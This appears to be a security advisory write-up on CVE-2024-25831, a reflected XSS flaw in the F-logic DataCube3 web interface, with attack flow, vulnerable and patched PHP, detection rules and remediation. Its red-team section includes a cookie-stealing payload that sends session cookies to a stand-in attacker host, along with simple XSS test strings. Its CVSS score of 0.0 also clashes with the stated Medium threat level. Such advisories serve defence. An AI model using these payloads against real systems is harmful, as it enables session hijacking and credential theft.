CVE-2024-25831
Executive Summary
CVE-2024-25831 is a reflected cross-site scripting (XSS) vulnerability affecting F-logic DataCube3 Version 1.0. The vulnerability stems from improper input sanitization in the web management interface, allowing an authenticated, remote attacker to execute arbitrary JavaScript code. This can lead to session hijacking, credential theft, or defacement of the management interface. No patch is currently available, and the vendor has not released a fix.

Supply Chain & Package Security
This vulnerability is not related to any package ecosystem (NPM, PyPI, Go, Ruby). It is a standalone embedded system vulnerability in the F-logic DataCube3 product.
CVSS Breakdown & Threat Level
- CVSS Score: 0.0 (No official vector provided)
- Attack Vector: Network
- Attack Complexity: Low
- Privileges Required: Low (Authenticated)
- User Interaction: Required (Victim must click a crafted link)
- Scope: Unchanged
- Confidentiality Impact: Low
- Integrity Impact: Low
- Availability Impact: None
- Threat Level: Medium (due to authenticated requirement but potential for session hijacking)
Deep Dive & Mechanics
The vulnerability exists in the web management interface of F-logic DataCube3 Version 1.0. The application fails to properly sanitize user-supplied input before reflecting it back in HTTP responses. An authenticated attacker can craft a malicious URL containing JavaScript payloads. When a victim (also authenticated) clicks the link, the script executes in the context of the victim's session, allowing the attacker to perform actions on behalf of the victim.
Root Cause: Lack of output encoding or input validation in the web interface's response generation.
Attack Flow:
- Attacker authenticates to the DataCube3 web interface.
- Attacker crafts a URL with a malicious JavaScript payload in a parameter (e.g.,
?param=<script>alert(1)</script>). - Attacker sends the URL to a victim (e.g., via phishing email).
- Victim, authenticated to the same interface, clicks the link.
- The server reflects the payload without sanitization, executing the script in the victim's browser.
- The script can steal cookies, perform actions, or deface the page.
Vulnerable vs. Patched Code
Vulnerable Code (Conceptual):
// Vulnerable: Direct reflection without sanitization
$param = $_GET['param'];
echo "<div>You entered: " . $param . "</div>";
Patched Code (Conceptual):
// Patched: Use htmlspecialchars to escape output
$param = $_GET['param'];
echo "<div>You entered: " . htmlspecialchars($param, ENT_QUOTES, 'UTF-8') . "</div>";
Since no official patch exists, the above is a recommended fix.
Exploitation & Lab Setup
Red Team
Prerequisites:
- Access to F-logic DataCube3 Version 1.0 (e.g., in a lab environment)
- Authenticated session to the web management interface
Exploit Steps:
- Identify a parameter that reflects user input (e.g.,
search,error,msg). - Craft a payload:
http://target/cgi-bin/interface?param=<script>alert(document.cookie)</script> - Send the link to a victim via social engineering.
- Upon click, the script executes, stealing cookies or performing actions.
Example Payload (Session Hijacking):
<script>document.location='http://attacker.com/steal?cookie='+document.cookie</script>
Blue Team
Detection:
- Monitor web logs for unusual parameters containing
<script>,onerror,onload, or JavaScript event handlers. - Look for repeated requests to the same endpoint with varying payloads.
- Use WAF rules to block reflected XSS patterns.
Mitigation:
- Implement input validation and output encoding.
- Use Content Security Policy (CSP) headers to restrict script execution.
- Apply the conceptual patch above if possible.
Indicators of Compromise (IOCs)
- Network: HTTP requests with parameters containing
<script>,%3Cscript%3E, or JavaScript event handlers. - Logs: Repeated 200 responses to the same endpoint with different payloads.
- Endpoint:
/cgi-bin/interfaceor similar management interface paths. - Payload Examples:
<script>alert(1)</script><img src=x onerror=alert(1)>javascript:alert(1)

Remediation & Mitigation
Immediate Actions:
- Disable the web management interface if not required.
- Restrict access to the interface via firewall rules (allow only trusted IPs).
- Implement a Web Application Firewall (WAF) to block XSS patterns.
Long-term Fix:
- Apply output encoding (e.g.,
htmlspecialcharsin PHP) to all user-supplied data before reflection. - Use Content Security Policy (CSP) headers to prevent inline script execution.
- Contact F-logic for an official patch or consider upgrading to a newer version if available.
Workaround:
- If source code is accessible, manually patch the vulnerable endpoint as shown in the "Vulnerable vs. Patched Code" section.
